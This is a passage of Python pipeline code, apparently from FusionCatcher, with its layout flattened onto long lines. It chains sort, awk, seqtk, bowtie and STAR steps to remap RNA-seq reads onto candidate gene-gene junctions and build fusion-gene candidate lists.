job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') if eporcrlf2igh == False: job.add('awk',kind='parameter') job.add('',"""'{n=length($0); if (olde=="a" && substr($0,0,n-1)==old && substr($0,n,1)=="b") {print old"a\\n"$0; old="";} {old=substr($0,0,n-1); olde=substr($0,n,1);}}'""",kind='parameter') else: job.add('awk',kind='parameter') job.add("""'{n=length($0); r=substr($0,1,n-1); print r"a"; print r"b"}'""",kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_unique_cuts_star.txt'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input') job.add('',outdir('reads_filtered_unique_cuts_star.txt'),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r1r1.fq'),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input') job.add('',outdir('reads_filtered_unique_cuts_star.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_r2r2.fq'),kind='output') job.run() # this is for the case when the output from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_star_psl_r1r1.fq')),id = "##reads-ids_clip_star_psl_r1r1.fq##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r1r1-t.fq'),kind='output')
job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r2r2-t.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl_r1r1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r2r2.fq'),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_star_psl_r1r1.fq'), outdir('reads-ids_clip_star_psl_r1r1-t.fq'), temp_path=temp_flag) job.link(outdir('reads-ids_clip_star_psl_r2r2.fq'), outdir('reads-ids_clip_star_psl_r2r2-t.fq'), temp_path=temp_flag) # map using bowtie ms = min(options.mismatches,2) job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_star_psl_max_filtered.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_star_unique'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',outdir('gene-gene-bowtie_star_unique/'),kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_star_psl_r1r1-t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_r2r2-t.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('split_gene-gene_star_filtered.sam'),kind='output',temp_path=temp_flag) job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.run() # this is for the case when the output from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_star_psl_unmapped_filtered_1.fq')),id = "##reads-ids_clip_star_psl_unmapped_filtered_1.fq##"): job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r1.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_unmapped_filtered_1_t.fq'),kind='output') job.run() job.add('head',kind='program') job.add('-4',outdir('reads-ids_clip_star_psl_r2.fq'),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_unmapped_filtered_2_t.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl_unmapped_filtered_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_filtered_2.fq'),temp_path=temp_flag) else: job.link(outdir('reads-ids_clip_star_psl_unmapped_filtered_1.fq'), outdir('reads-ids_clip_star_psl_unmapped_filtered_1_t.fq'), temp_path=temp_flag) job.link(outdir('reads-ids_clip_star_psl_unmapped_filtered_2.fq'), outdir('reads-ids_clip_star_psl_unmapped_filtered_2_t.fq'), temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r2.fq'),temp_path=temp_flag) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter')
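# pull from gene-gene.fa only the candidate sequences named by the clipped alignments and build a dedicated bowtie index for the paired remapping that follows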
job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('reads-refs_clip_star_psl_uniq.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-bowtie_star.fa'),kind='output') job.run() job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('gene-gene-bowtie_star.fa'),kind='input',temp_path=temp_flag if options.skip_ig_star and eporcrlf2igh == False else 'no') job.add('',outdir('gene-gene-bowtie_star/'),kind='output',checksum='no') job.add('',outdir('gene-gene-bowtie_star/'),kind='output',command_line='no') job.run() # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_star'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if options.ff_tryhard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_star_psl_unmapped.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_star_psl_max.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('',outdir('gene-gene-bowtie_star/'),kind='input') job.add('-1',outdir('reads-ids_clip_star_psl_unmapped_filtered_1_t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_unmapped_filtered_2_t.fq'),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_star.sam'),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_star.sam'),kind='output') job.run() job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star.sam'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_patch.sam'),kind='output') job.run() job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('split_gene-gene_star_patch.sam'),kind='input',temp_path=temp_flag) #job.add('--output',outdir('split_gene-gene_star_patch.psl'),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') 
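# analyze_splits_sam.py downstream appears to rely on the PSL being sorted by read name (column 10), target name (column 14) and target start/end (columns 12-13), hence this multi-key sort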
job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_star_patch.psl'),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_patch.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_final.psl'),kind='output') job.add('--remove-extra',kind='parameter') job.run() if job.iff(empty(outdir('reads-ids_clip_star_psl_unmapped_1.fq')) or eporcrlf2igh == False,id = "#reads-ids_clip_star_psl_unmapped_1#"): job.clean(outdir('reads-ids_clip_star_psl_unmapped_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_2.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_uniq.txt'),temp_path=temp_flag) job.clean(outdir('gene-gene-bowtie_star/'),temp_path=temp_flag) job.clean(outdir('gene-gene-bowtie_star.fa'),temp_path=temp_flag) else: ########################################################## # unmapped reads are mapped again, allowing a gap in their alignment ########################################################## # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'NR%4==1 {print substr($0,2,index($0,"__")-2)}'""",outdir('reads-ids_clip_star_psl_unmapped_1.fq'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') #job.add('',outdir('reads-ids_clip_star_psl.fq'),kind='input',temp_path=temp_flag) if options.trim_psl_3end_keep < max_len_reads and (not options.skip_extension): job.add('',outdir('original_important.fq.gz'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'trim_poly_tails.py',kind='parameter') job.add('--input','-',kind='parameter') job.add('--repeats',length_anchor_minimum - 1,kind='parameter') # 12 job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'clip_quality.py',kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('-t',options.trim_quality,kind='parameter') # below Q5 trimming starts
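# gap rescue: reads are re-extracted from the original FASTQ (poly-A/T tails trimmed and low-quality ends clipped when read extension is enabled) and re-split below around a tolerated gap of --length-gap bases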
job.add('--score-type','sanger',kind='parameter') job.add('--input','-',kind='parameter') job.add('--output',outdir('reads-ids_clip_star_psl_unmapped_x.fq'),kind='output') else: job.add('',outdir('reads-ids_clip_star_psl.fq'),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl_unmapped_x.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_2.fq'),temp_path=temp_flag) job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_star_psl_unmapped_x.fq'),kind='input',temp_path=temp_flag) job.add('--list',outdir('reads-ids_clip_star_psl_uniq.txt'),kind='input',temp_path=temp_flag) job.add('--output-1',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq'),kind='output') job.add('--output-2',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq'),kind='output') job.add('--wiggle-size',options.gap_wiggle_size,kind='parameter') job.add('--gap-size',options.length_gap,kind='parameter') job.add('--anchor-size',options.length_anchor_gap,kind='parameter') job.add('--anchor-size-max',options.length_anchor_gap_max,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') if not options.skip_ig_star: job.add('--output-2-rc',kind='parameter') job.add('--replace-solexa-ids','=',kind='parameter') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) if options.skip_ig_star: job.clean(outdir('gene-gene-bowtie_star.fa'),temp_path=temp_flag) # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') #job.add('-v',options.mismatches,kind='parameter') job.add('-v',options.mismatches+1,kind='parameter') # 2 here is not enough for IGH!!!! job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_star'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') ##job.add('--tryhard',kind='parameter') #???? 
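# --best/--strata below keep only the best alignment stratum; --ff expects the forward/forward mate orientation that split-reads.py produced (mate 2 is reverse-complemented via --output-2-rc unless IG STAR realignment is skipped)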
job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('',outdir('gene-gene-bowtie_star/'),kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq'),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_star_unmapped.sam'),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-unampped.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-unampped.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_star_unmapped.sam'),kind='output') job.run() else: job.clean(outdir('gene-gene-bowtie_star/'),temp_path=temp_flag) # job.add('du',kind='program') # job.add('-b',outdir('gene-gene-bowtie_star.fa'),kind='input') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',outdir('gene-gene2__nuc.txt'),kind='output') # job.run() job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',outdir('gene-gene-bowtie_star.fa'),kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',outdir('gene-gene2__nuc.txt'),kind='output') job.run() nucleotides2_gg = int(float(file(outdir('gene-gene2__nuc.txt'),'r').readline().strip())) job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-c',kind='parameter') job.add("'^>'",outdir('gene-gene-bowtie_star.fa'),kind='input') job.add('>',outdir('gene-gene2__seq.txt'),kind='output') job.run(successful_exit_status=(0,1)) sequences2_gg = int((file(outdir('gene-gene2__seq.txt'),'r').readline().strip())) genomesaindexnbases2 = int(min(14, math.log(nucleotides2_gg,2)/(float(2)) - 1)) genomechrbinnbits2 = int(min(18, math.log(float(nucleotides2_gg)/float(sequences2_gg),2))) # build the STAR index job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',genomechrbinnbits2,kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases2,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--genomeDir',outdir('gene-gene-bowtie_star2/'),kind='output') job.add('--genomeFastaFiles',outdir('gene-gene-bowtie_star.fa'),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-bowtie_star2_results/'),kind='output',temp_path=temp_flag) job.run() # align the unmapped reads using STAR on candidate fusion gene-gene # idea: --alignEndsType Extend5pOfRead1 --outFilterMismatchNmax 0 --seedSearchStartLmax 999 mirna = False job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') #job.add('--twopass1readsN','-1',kind='parameter') #job.add('--twopassMode','Basic',kind='parameter') 
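# assumption: --scoreGap -10000 below makes any STAR-introduced splice gap prohibitively expensive, so a read can only be split across the engineered gene-gene junction itself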
job.add('--genomeSAindexNbases',genomesaindexnbases2,kind='parameter') job.add('--alignIntronMax',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') job.add('--outFilterMatchNmin',length_anchor_star-1,kind='parameter') # 17 job.add('--outSAMattributes','NM',kind='parameter') # 'NM' ==> NM is different than nM job.add('--outFilterMatchNminOverLread','0.80',kind='parameter') job.add('--outFilterScoreMinOverLread','0.80',kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate','0.80',kind='parameter') # NEW in v0.99.4b if star25: job.add('--alignSJstitchMismatchNmax','5 -1 5 5',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.x job.add('--genomeDir',outdir('gene-gene-bowtie_star2/'),kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--alignTranscriptsPerReadNmax','500000',kind='parameter') # if this is missing STAR crashes in some cases job.add('--scoreGap','-10000',kind='parameter') if not mirna: job.add('--alignEndsType','EndToEnd',kind='parameter') # disable soft clipping job.add('--seedSearchStartLmax',length_anchor_star-1,kind='parameter')# default is: 50 else: #job.add('--alignEndsType','Extend5pOfRead1',kind='parameter') # behaves like a miRNA alignment job.add('--alignEndsType','EndToEnd',kind='parameter') # behaves like a miRNA alignment job.add('--seedSearchStartLmax','999',kind='parameter')# default is: 50 job.add('--readFilesIn',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq'),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-star-results-unmapped/'),kind='output') job.run() job.link(outdir('gene-gene-star-results-unmapped','Aligned.out.sam'),outdir('split_gene-gene_star_unmapped.sam'),temp_path=temp_flag) job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped.sam'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_unmapped_patch.sam'),kind='output') #job.add('--mismatches-long',options.mismatches+1,kind='parameter') job.add('--mismatches-long',options.mismatches_gap,kind='parameter') job.add('--mismatches-short',options.mismatches,kind='parameter') if not options.skip_ig_star: job.add('--forward-reverse',kind='parameter') job.run() job.clean(outdir('gene-gene-star-results-unmapped/'),temp_path=temp_flag) job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped_patch.sam'),kind='input',temp_path=temp_flag) if not options.skip_ig_star: job.add('--replace-read-ids','=',kind='parameter') #job.add('--output',outdir('split_gene-gene_star_unmapped_patch.psl'),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') 
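# external sorts spill to tmp_dir; lzop is preferred over gzip for compressing the spill files since it is faster at a slightly worse ratio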
job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_star_unmapped_patch.psl'),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped_patch.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_unmapped_final.psl'),kind='output') job.add('--remove-extra',kind='parameter') job.run() if job.iff(empty(outdir('split_gene-gene_star_final.psl')),id = "#split_gene-gene_star_final#"): job.link(outdir('gene-gene-star.psl'), outdir('gene-gene-star_more.psl'), temp_path=temp_flag) job.clean(outdir('split_gene-gene_star.psl'),temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('split_gene-gene_star_final.psl'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-star.psl'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-star_more.psl'),kind='output') job.run() # find the best unique alignments of reads job.add(_FC_+'psl_best_unique_contigs.py',kind='program') job.add('--input',outdir('gene-gene-star_more.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('gene-gene-star_best-unique.psl'),kind='output') # if (not empty(outdir('candidate_fusion-genes_further_mark.txt'))) and (not empty(datadir('custom_genes.txt'))): # job.add('--ties',datadir('custom_genes_mark.txt'),kind='input') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') job.add('--ties-overlappings',datadir('ensembl_overlapping_genes.txt'),kind='input') job.add('--anchor',length_anchor_star,kind='parameter') # find_fusion_genes_blat.py --threshold_overlap is enough! job.add('--mismatches',options.mismatches_psl,kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--tmp_dir',tmp_dir,kind='output',checksum='no') job.run() # more filtering -- remove the reads from the gene-gene junctions # which have the pair read mapping on a totally different gene than # those involved in the gene-gene junction if not options.all_reads_junction: job.add(_FC_+'remove_reads_exon_exon_psl.py',kind='program') job.add('--input_psl',outdir('gene-gene-star_best-unique.psl'),kind='input',temp_path=temp_flag) job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='input') job.add('--output_psl',outdir('gene-gene-star_best-unique_gene_pairs.psl'),kind='output') job.run() else: job.link(outdir('gene-gene-star_best-unique.psl'), outdir('gene-gene-star_best-unique_gene_pairs.psl'), temp_path=temp_flag) job.add(_FC_+'find_fusion_genes_psl.py',kind='program') job.add('--input_mappings',outdir('gene-gene-star_best-unique_gene_pairs.psl'),kind='input',temp_path=temp_flag) job.add('--input_genegene_fasta',outdir('gene-gene.fa'),kind='input') job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--input_genes_positions',datadir('genes.txt'),kind='input') job.add('--threshold_overlap',length_anchor_star,kind='parameter') job.add('--mismatches',options.mismatches_psl,kind='parameter') job.add('--output',outdir('candidates_fusion_genes_reads_star7.txt'),kind='output') job.run() job.add(_FC_+'smoothing_fusions_psl.py',kind='program') job.add('--input',outdir('candidates_fusion_genes_reads_star7.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('candidates_fusion_genes_reads_star.txt'),kind='output') job.add('--wiggle','3',kind='parameter') job.run() #eporcrlf2igh if job.iff(eporcrlf2igh and (not 
empty(outdir('split_gene-gene_star_unmapped_final.psl'))), id ="#split_gene-gene_star_unmapped_final.psl#"): # find the best unique alignments of reads job.add(_FC_+'psl_best_unique_contigs.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped_final.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('gene-gene-star_best-unique_.psl'),kind='output') job.add('--ties-overlappings',datadir('ensembl_overlapping_genes.txt'),kind='input') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') job.add('--anchor',length_anchor_star,kind='parameter') # find_fusion_genes_blat.py --threshold_overlap is enough! job.add('--mismatches',options.mismatches_gap,kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--tmp_dir',tmp_dir,kind='output',checksum='no') job.run() job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-F',kind='parameter') #job.add('-f',datadir('ig_loci.txt'),kind='input') job.add('-f',datadir('gap_fusions.txt'),kind='input') job.add('',outdir('gene-gene-star_best-unique_.psl'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('grep',kind='parameter') job.add('-F',kind='parameter') job.add('-f',outdir('eporcrlf2.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-star_best-unique_2.psl'),kind='output') job.run(successful_exit_status=(0,1)) if not options.all_reads_junction: job.add(_FC_+'remove_reads_exon_exon_psl.py',kind='program') job.add('--input_psl',outdir('gene-gene-star_best-unique_2.psl'),kind='input',temp_path=temp_flag) job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='input') job.add('--output_psl',outdir('gene-gene-star_best-unique_gene_pairs_.psl'),kind='output') job.run() else: job.link(outdir('gene-gene-star_best-unique_2.psl'), outdir('gene-gene-star_best-unique_gene_pairs_.psl'), temp_path=temp_flag) job.add(_FC_+'find_fusion_genes_psl.py',kind='program') job.add('--input_mappings',outdir('gene-gene-star_best-unique_gene_pairs_.psl'),kind='input',temp_path=temp_flag) job.add('--input_genegene_fasta',outdir('gene-gene.fa'),kind='input') job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--input_genes_positions',datadir('genes.txt'),kind='input') job.add('--threshold_overlap',options.length_anchor_gap,kind='parameter') job.add('--mismatches',options.mismatches_gap,kind='parameter') job.add('--separator','*%s' % ("N"*options.length_gap,),kind='parameter') job.add('--output',outdir('candidates_fusion_genes_reads_star_.txt'),kind='output') job.run() if job.iff(not empty(outdir('candidates_fusion_genes_reads_star_.txt')), id ="#candidates_fusion_genes_reads_star_.txt#"): job.add(_FC_+'smoothing_fusions_psl.py',kind='program') job.add('--input',outdir('candidates_fusion_genes_reads_star_.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('candidates_fusion_genes_reads_star_2.txt'),kind='output') job.add('--wiggle','3',kind='parameter') job.run() job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("'1d'",kind='parameter') job.add('',outdir('candidates_fusion_genes_reads_star_2.txt'),kind='input',temp_path=temp_flag) job.add("|",kind='parameter') job.add('cat',kind='parameter') job.add('',outdir('candidates_fusion_genes_reads_star.txt'),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') 
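# the sed '1d' above drops the header line of the gap-based candidate list so it can be appended cleanly to the STAR-based candidates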
job.add('>',outdir('candidates_fusion_genes_reads_star_last.txt'),kind='output') job.run() else: job.link(outdir('candidates_fusion_genes_reads_star.txt'), outdir('candidates_fusion_genes_reads_star_last.txt'), temp_path=temp_flag) else: job.link(outdir('candidates_fusion_genes_reads_star.txt'), outdir('candidates_fusion_genes_reads_star_last.txt'), temp_path=temp_flag) job.clean(outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),temp_path=temp_flag if options.skip_bowtie2 else 'no') job.clean(outdir('gene-gene.fa'),temp_path=temp_flag if options.skip_bowtie2 else 'no') # summary of gene-gene mappings job.add(_FC_+'build_report_fusions_psl.py',kind='program') job.add('--suporting_unique_reads',spanning_reads_star,kind='parameter') job.add('--anchor2',length_anchor2,kind='parameter') job.add('--mismatches',options.mismatches_psl+1,kind='parameter') job.add('--mismatches-gap',options.mismatches_gap,kind='parameter') 